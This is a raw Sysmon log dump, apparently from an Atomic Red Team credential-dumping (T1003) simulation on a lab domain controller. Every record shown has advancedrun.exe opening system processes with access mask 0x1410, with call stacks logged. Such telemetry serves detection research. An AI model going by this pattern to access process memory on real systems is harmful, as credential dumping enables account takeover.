Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
